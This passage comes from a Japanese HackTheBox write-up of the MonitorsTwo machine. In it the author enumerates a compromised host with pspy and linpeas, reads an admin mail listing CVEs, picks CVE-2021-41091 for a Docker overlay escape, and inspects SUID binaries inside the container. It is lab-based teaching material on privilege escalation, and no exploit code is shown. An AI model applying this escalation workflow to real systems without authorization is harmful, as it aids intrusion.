2023/05/01 08:01:26 CMD: UID=0 PID=227 |
2023/05/01 08:01:26 CMD: UID=0 PID=226 |
2023/05/01 08:01:26 CMD: UID=0 PID=225 |
2023/05/01 08:01:26 CMD: UID=0 PID=219 |
2023/05/01 08:01:26 CMD: UID=0 PID=218 |
2023/05/01 08:01:26 CMD: UID=0 PID=216 |
2023/05/01 08:01:26 CMD: UID=0 PID=215 |
2023/05/01 08:01:26 CMD: UID=0 PID=210 |
2023/05/01 08:01:26 CMD: UID=0 PID=205 |
2023/05/01 08:01:26 CMD: UID=0 PID=204 |
2023/05/01 08:01:26 CMD: UID=0 PID=203 |
2023/05/01 08:01:26 CMD: UID=0 PID=202 |
2023/05/01 08:01:26 CMD: UID=0 PID=157 |
2023/05/01 08:01:26 CMD: UID=0 PID=144 |
2023/05/01 08:01:26 CMD: UID=0 PID=141 |
2023/05/01 08:01:26 CMD: UID=0 PID=131 |
2023/05/01 08:01:26 CMD: UID=0 PID=130 |
2023/05/01 08:01:26 CMD: UID=0 PID=128 |
2023/05/01 08:01:26 CMD: UID=0 PID=127 |
2023/05/01 08:01:26 CMD: UID=0 PID=126 |
2023/05/01 08:01:26 CMD: UID=0 PID=125 |
2023/05/01 08:01:26 CMD: UID=0 PID=124 |
2023/05/01 08:01:26 CMD: UID=0 PID=123 |
2023/05/01 08:01:26 CMD: UID=0 PID=122 |
2023/05/01 08:01:26 CMD: UID=0 PID=121 |
2023/05/01 08:01:26 CMD: UID=0 PID=120 |
2023/05/01 08:01:26 CMD: UID=0 PID=119 |
2023/05/01 08:01:26 CMD: UID=0 PID=118 |
2023/05/01 08:01:26 CMD: UID=0 PID=117 |
2023/05/01 08:01:26 CMD: UID=0 PID=116 |
2023/05/01 08:01:26 CMD: UID=0 PID=115 |
2023/05/01 08:01:26 CMD: UID=0 PID=114 |
2023/05/01 08:01:26 CMD: UID=0 PID=113 |
2023/05/01 08:01:26 CMD: UID=0 PID=112 |
2023/05/01 08:01:26 CMD: UID=0 PID=111 |
2023/05/01 08:01:26 CMD: UID=0 PID=110 |
2023/05/01 08:01:26 CMD: UID=0 PID=109 |
2023/05/01 08:01:26 CMD: UID=0 PID=108 |
2023/05/01 08:01:26 CMD: UID=0 PID=107 |
2023/05/01 08:01:26 CMD: UID=0 PID=106 |
2023/05/01 08:01:26 CMD: UID=0 PID=105 |
2023/05/01 08:01:26 CMD: UID=0 PID=104 |
2023/05/01 08:01:26 CMD: UID=0 PID=103 |
2023/05/01 08:01:26 CMD: UID=0 PID=102 |
2023/05/01 08:01:26 CMD: UID=0 PID=101 |
2023/05/01 08:01:26 CMD: UID=0 PID=100 |
2023/05/01 08:01:26 CMD: UID=0 PID=99 |
2023/05/01 08:01:26 CMD: UID=0 PID=98 |
2023/05/01 08:01:26 CMD: UID=0 PID=97 |
2023/05/01 08:01:26 CMD: UID=0 PID=96 |
2023/05/01 08:01:26 CMD: UID=0 PID=95 |
2023/05/01 08:01:26 CMD: UID=0 PID=94 |
2023/05/01 08:01:26 CMD: UID=0 PID=93 |
2023/05/01 08:01:26 CMD: UID=0 PID=92 |
2023/05/01 08:01:26 CMD: UID=0 PID=91 |
2023/05/01 08:01:26 CMD: UID=0 PID=89 |
2023/05/01 08:01:26 CMD: UID=0 PID=88 |
2023/05/01 08:01:26 CMD: UID=0 PID=85 |
2023/05/01 08:01:26 CMD: UID=0 PID=84 |
2023/05/01 08:01:26 CMD: UID=0 PID=83 |
2023/05/01 08:01:26 CMD: UID=0 PID=82 |
2023/05/01 08:01:26 CMD: UID=0 PID=81 |
2023/05/01 08:01:26 CMD: UID=0 PID=80 |
2023/05/01 08:01:26 CMD: UID=0 PID=79 |
2023/05/01 08:01:26 CMD: UID=0 PID=78 |
2023/05/01 08:01:26 CMD: UID=0 PID=77 |
2023/05/01 08:01:26 CMD: UID=0 PID=30 |
2023/05/01 08:01:26 CMD: UID=0 PID=29 |
2023/05/01 08:01:26 CMD: UID=0 PID=28 |
2023/05/01 08:01:26 CMD: UID=0 PID=27 |
2023/05/01 08:01:26 CMD: UID=0 PID=26 |
2023/05/01 08:01:26 CMD: UID=0 PID=25 |
2023/05/01 08:01:26 CMD: UID=0 PID=24 |
2023/05/01 08:01:26 CMD: UID=0 PID=23 |
2023/05/01 08:01:26 CMD: UID=0 PID=22 |
2023/05/01 08:01:26 CMD: UID=0 PID=21 |
2023/05/01 08:01:26 CMD: UID=0 PID=20 |
2023/05/01 08:01:26 CMD: UID=0 PID=18 |
2023/05/01 08:01:26 CMD: UID=0 PID=17 |
2023/05/01 08:01:26 CMD: UID=0 PID=16 |
2023/05/01 08:01:26 CMD: UID=0 PID=15 |
2023/05/01 08:01:26 CMD: UID=0 PID=14 |
2023/05/01 08:01:26 CMD: UID=0 PID=13 |
2023/05/01 08:01:26 CMD: UID=0 PID=12 |
2023/05/01 08:01:26 CMD: UID=0 PID=11 |
2023/05/01 08:01:26 CMD: UID=0 PID=10 |
2023/05/01 08:01:26 CMD: UID=0 PID=9 |
2023/05/01 08:01:26 CMD: UID=0 PID=8 |
2023/05/01 08:01:26 CMD: UID=0 PID=6 |
2023/05/01 08:01:26 CMD: UID=0 PID=4 |
2023/05/01 08:01:26 CMD: UID=0 PID=3 |
2023/05/01 08:01:26 CMD: UID=0 PID=2 |
2023/05/01 08:01:26 CMD: UID=0 PID=1 | /sbin/init maybe-ubiquity
なんもいいのない。
linpeas
ということでlinpeas使います。Linemunよりこっち派。
以下のサイトからlinpeas.shをダウンロードしてくる。
起動します。
marcus@monitorstwo:/tmp$ ./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.'
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
...省略
╔══════════╣ Files inside /home/marcus (limit 20)
total 32
drwxr-xr-x 4 marcus marcus 4096 May 1 08:02 .
drwxr-xr-x 3 root root 4096 Jan 5 09:51 ..
lrwxrwxrwx 1 root root 9 Jan 5 10:12 .bash_history -> /dev/null
-rw-r--r-- 1 marcus marcus 220 Jan 5 09:51 .bash_logout
-rw-r--r-- 1 marcus marcus 3771 Jan 5 09:51 .bashrc
drwx------ 2 marcus marcus 4096 Mar 21 10:49 .cache
drwx------ 3 marcus marcus 4096 May 1 08:02 .gnupg
-rw-r--r-- 1 marcus marcus 807 Jan 5 09:51 .profile
-rw-r----- 1 root marcus 33 May 1 02:15 user.txt
╔══════════╣ Files inside others home (limit 20)
/var/www/html/index.nginx-debian.html
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
4721 4 -rw-r--r-- 1 root mail 1809 Oct 18 2021 /var/mail/marcus
4721 4 -rw-r--r-- 1 root mail 1809 Oct 18 2021 /var/spool/mail/marcus
╔══════════╣ Backup files (limited 100)
-rwxr-xr-x 1 root root 226 Feb 17 2020 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 392817 Feb 9 2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 11886 Mar 22 12:29 /usr/share/info/dir.old
-rw-r--r-- 1 root root 2756 Feb 13 2020 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 0 Mar 21 09:50 /usr/src/linux-headers-5.4.0-147-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Mar 21 09:50 /usr/src/linux-headers-5.4.0-147-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 237898 Mar 21 09:50 /usr/src/linux-headers-5.4.0-147-generic/.config.old
-rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/src/linux-headers-5.4.0-147/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 44048 Sep 19 2022 /usr/lib/x86_64-linux-gnu/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 9833 Mar 21 09:50 /usr/lib/modules/5.4.0-147-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 9073 Mar 21 09:50 /usr/lib/modules/5.4.0-147-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 1802 Aug 15 2022 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 1413 Jan 9 10:39 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-38.pyc
-rw-r--r-- 1 root root 4096 May 1 08:02 /sys/devices/virtual/net/veth48bf901/brport/backup_port
-rw-r--r-- 1 root root 4096 May 1 08:02 /sys/devices/virtual/net/veth6933c2d/brport/backup_port
-rw-r--r-- 1 root root 2743 Apr 23 2020 /etc/apt/sources.list.curtin.old
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001
-> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)
-> Extracting tables from /var/lib/fwupd/pending.db (limit 20)
-> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K Jan 9 10:03 .
drwxr-xr-x 13 root root 4.0K Jan 9 10:03 ..
drwxr-xr-x 2 root root 4.0K Jan 9 10:03 html
/var/www/html:
total 12K
drwxr-xr-x 2 root root 4.0K Jan 9 10:03 .
drwxr-xr-x 3 root root 4.0K Jan 9 10:03 ..
...省略
何やらmailのファイルがあることがわかるのでこの中身を見てみることにする。
marcus@monitorstwo:/var$ cd mail
marcus@monitorstwo:/var/mail$ ls -lta
total 12
drwxrwsr-x 2 root mail 4096 Mar 22 11:46 .
drwxr-xr-x 13 root root 4096 Jan 9 10:03 ..
-rw-r--r-- 1 root mail 1809 Oct 18 2021 marcus
marcus@monitorstwo:/var/mail$ cat marcus
From: administrator@monitorstwo.htb
To: all@monitorstwo.htb
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of
Dear all,
We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.
CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.
CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.
CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.
We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.
Best regards,
Administrator
CISO
Monitor Two
Security Team
marcus@monitorstwo:/var/mail$
marcus@monitorstwo:/var/mail$ cd /var/spool/mail
marcus@monitorstwo:/var/spool/mail$ ls -lta
total 12
drwxrwsr-x 2 root mail 4096 Mar 22 11:46 .
drwxr-xr-x 13 root root 4096 Jan 9 10:03 ..
-rw-r--r-- 1 root mail 1809 Oct 18 2021 marcus
marcus@monitorstwo:/var/spool/mail$ cat marcus
From: administrator@monitorstwo.htb
To: all@monitorstwo.htb
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of
Dear all,
We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.
CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.
CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.
CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.
We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.
Best regards,
Administrator
CISO
Monitor Two
Security Team
marcus@monitorstwo:/var/spool/mail$
同じ内容のようである。
英訳してみるとこんな感じだ。
何やら脆弱性が存在することを示唆する内容である。
このどれかを試していくんだろう。
※ここでCVE-2021-33033を試した人は4んでしまう。実際にやったが4んだ。すごく時間を使ったのにやってしまった。
CVE-2021-41091
この脆弱性の詳しい説明はこの記事を確認してみればいい。
というよりこのPoCをそのまま試していくだけである。
実際に脆弱性が存在するかどうかを確認しておく。
marcus@monitorstwo:~$ findmnt
TARGET SOURCE FSTYPE OPTIONS
/ /dev/sda2 ext4 rw,relatime
├─/sys sysfs sysfs rw,nosuid,nodev,noexec,relatime
│ ├─/sys/kernel/security securityfs securityfs rw,nosuid,nodev,noexec,relatime
│ ├─/sys/fs/cgroup tmpfs tmpfs ro,nosuid,nodev,noexec,mode=755
│ │ ├─/sys/fs/cgroup/unified cgroup2 cgroup2 rw,nosuid,nodev,noexec,relatime,nsdelegate
│ │ ├─/sys/fs/cgroup/systemd cgroup cgroup rw,nosuid,nodev,noexec,relatime,xattr,name=systemd
│ │ ├─/sys/fs/cgroup/cpu,cpuacct cgroup cgroup rw,nosuid,nodev,noexec,relatime,cpu,cpuacct
│ │ ├─/sys/fs/cgroup/memory cgroup cgroup rw,nosuid,nodev,noexec,relatime,memory
│ │ ├─/sys/fs/cgroup/rdma cgroup cgroup rw,nosuid,nodev,noexec,relatime,rdma
│ │ ├─/sys/fs/cgroup/cpuset cgroup cgroup rw,nosuid,nodev,noexec,relatime,cpuset
│ │ ├─/sys/fs/cgroup/perf_event cgroup cgroup rw,nosuid,nodev,noexec,relatime,perf_event
│ │ ├─/sys/fs/cgroup/pids cgroup cgroup rw,nosuid,nodev,noexec,relatime,pids
│ │ ├─/sys/fs/cgroup/freezer cgroup cgroup rw,nosuid,nodev,noexec,relatime,freezer
│ │ ├─/sys/fs/cgroup/net_cls,net_prio cgroup cgroup rw,nosuid,nodev,noexec,relatime,net_cls,net_prio
│ │ ├─/sys/fs/cgroup/hugetlb cgroup cgroup rw,nosuid,nodev,noexec,relatime,hugetlb
│ │ ├─/sys/fs/cgroup/devices cgroup cgroup rw,nosuid,nodev,noexec,relatime,devices
│ │ └─/sys/fs/cgroup/blkio cgroup cgroup rw,nosuid,nodev,noexec,relatime,blkio
│ ├─/sys/fs/pstore pstore pstore rw,nosuid,nodev,noexec,relatime
│ ├─/sys/fs/bpf none bpf rw,nosuid,nodev,noexec,relatime,mode=700
│ ├─/sys/kernel/debug debugfs debugfs rw,nosuid,nodev,noexec,relatime
│ ├─/sys/kernel/tracing tracefs tracefs rw,nosuid,nodev,noexec,relatime
│ ├─/sys/fs/fuse/connections fusectl fusectl rw,nosuid,nodev,noexec,relatime
│ └─/sys/kernel/config configfs configfs rw,nosuid,nodev,noexec,relatime
├─/proc proc proc rw,nosuid,nodev,noexec,relatime
│ └─/proc/sys/fs/binfmt_misc systemd-1 autofs rw,relatime,fd=28,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=16015
│ └─/proc/sys/fs/binfmt_misc binfmt_misc binfmt_misc rw,nosuid,nodev,noexec,relatime
├─/dev udev devtmpfs rw,nosuid,noexec,relatime,size=1966928k,nr_inodes=491732,mode=755
│ ├─/dev/pts devpts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000
│ ├─/dev/shm tmpfs tmpfs rw,nosuid,nodev
│ ├─/dev/mqueue mqueue mqueue rw,nosuid,nodev,noexec,relatime
│ └─/dev/hugepages hugetlbfs hugetlbfs rw,relatime,pagesize=2M
├─/run tmpfs tmpfs rw,nosuid,nodev,noexec,relatime,size=402608k,mode=755
│ ├─/run/lock tmpfs tmpfs rw,nosuid,nodev,noexec,relatime,size=5120k
│ ├─/run/docker/netns/79f1a112b222 nsfs[net:[4026532570]]
│ │ nsfs rw
│ ├─/run/user/1000 tmpfs tmpfs rw,nosuid,nodev,relatime,size=402608k,mode=700,uid=1000,gid=1000
│ └─/run/docker/netns/de2f680254ac nsfs[net:[4026532632]]
│ nsfs rw
├─/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
│ overlay overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/756FTPFO4AE7HBWVGI5TXU76FU:/var/lib/docker/ove
├─/var/lib/docker/containers/e2378324fced58e8166b82ec842ae45961417b4195aade5113fdc9c6397edc69/mounts/shm
│ shm tmpfs rw,nosuid,nodev,noexec,relatime,size=65536k
├─/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
│ overlay overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/4Z77R4WYM6X4BLW7GXAJOAA4SJ:/var/lib/docker/ove
└─/var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/mounts/shm
shm tmpfs rw,nosuid,nodev,noexec,relatime,size=65536k
marcus@monitorstwo:~$
marcus@monitorstwo:~$
marcus@monitorstwo:~$
marcus@monitorstwo:~$ cd /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
marcus@monitorstwo:/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged$ ls -lta
total 128
drwxrwxrwt 1 root root 36864 May 1 12:30 tmp
drwx-----x 5 root root 4096 May 1 02:15 ..
drwxr-xr-x 1 root root 4096 Mar 22 13:21 bin
drwxr-xr-x 2 root root 4096 Mar 22 13:21 boot
drwxr-xr-x 2 root root 4096 Mar 22 13:21 home
drwxr-xr-x 2 root root 4096 Mar 22 13:21 lib64
drwxr-xr-x 2 root root 4096 Mar 22 13:21 media
drwxr-xr-x 2 root root 4096 Mar 22 13:21 mnt
drwxr-xr-x 2 root root 4096 Mar 22 13:21 opt
drwxr-xr-x 2 root root 4096 Mar 22 13:21 proc
drwxr-xr-x 2 root root 4096 Mar 22 13:21 srv
drwxr-xr-x 2 root root 4096 Mar 22 13:21 sys
drwx------ 1 root root 4096 Mar 21 10:50 root
drwxr-xr-x 1 root root 4096 Mar 21 10:49 .
drwxr-xr-x 1 root root 4096 Mar 21 10:49 dev
drwxr-xr-x 1 root root 4096 Mar 21 10:49 etc
-rwxr-xr-x 1 root root 0 Mar 21 10:49 .dockerenv
drwxr-xr-x 1 root root 4096 Jan 9 09:30 sbin
-rwxr-xr-x 1 root root 0 Jan 5 11:37 entrypoint.sh
drwxr-xr-x 1 root root 4096 Nov 15 04:17 run
drwxr-xr-x 1 root root 4096 Nov 15 04:13 var
drwxr-xr-x 1 root root 4096 Nov 15 04:13 lib
drwxr-xr-x 1 root root 4096 Nov 14 00:00 usr
階層見れたので脆弱性があることが確認できた。
だがこの脆弱性を用いて権限昇格させるにはDocker環境がRoot権限でないといけない。
Docker環境でのPrivEscを試していく。
PrivEsc in Docker
linpeas in Docker
Docker環境内部でlinpeasを回してみる。
chmod +x linpeas.sh
./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission. '
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 5.4.0-147-generic (buildd@lcy02-amd64-067) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #164-Ubuntu SMP Tue Mar 21 14:23:17 UTC 2023
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: 50bca5e748b0
Writable folder: /dev/shm
[-] No network discovery capabilities (fping or ping not found)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
・・・省略
╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 87K Feb 7 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 63K Feb 7 2020 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 52K Feb 7 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 58K Feb 7 2020 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Feb 7 2020 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 31K Oct 14 2020 /sbin/capsh
-rwsr-xr-x 1 root root 55K Jan 20 2022 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 35K Jan 20 2022 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 71K Jan 20 2022 /bin/su
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root tty 35K Jan 20 2022 /usr/bin/wall
-rwxr-sr-x 1 root shadow 31K Feb 7 2020 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 79K Feb 7 2020 /usr/bin/chage
-rwxr-sr-x 1 root shadow 38K Aug 26 2021 /sbin/unix_chkpwd
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so
/etc/ld.so.conf
Content of /etc/ld.so.conf:
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
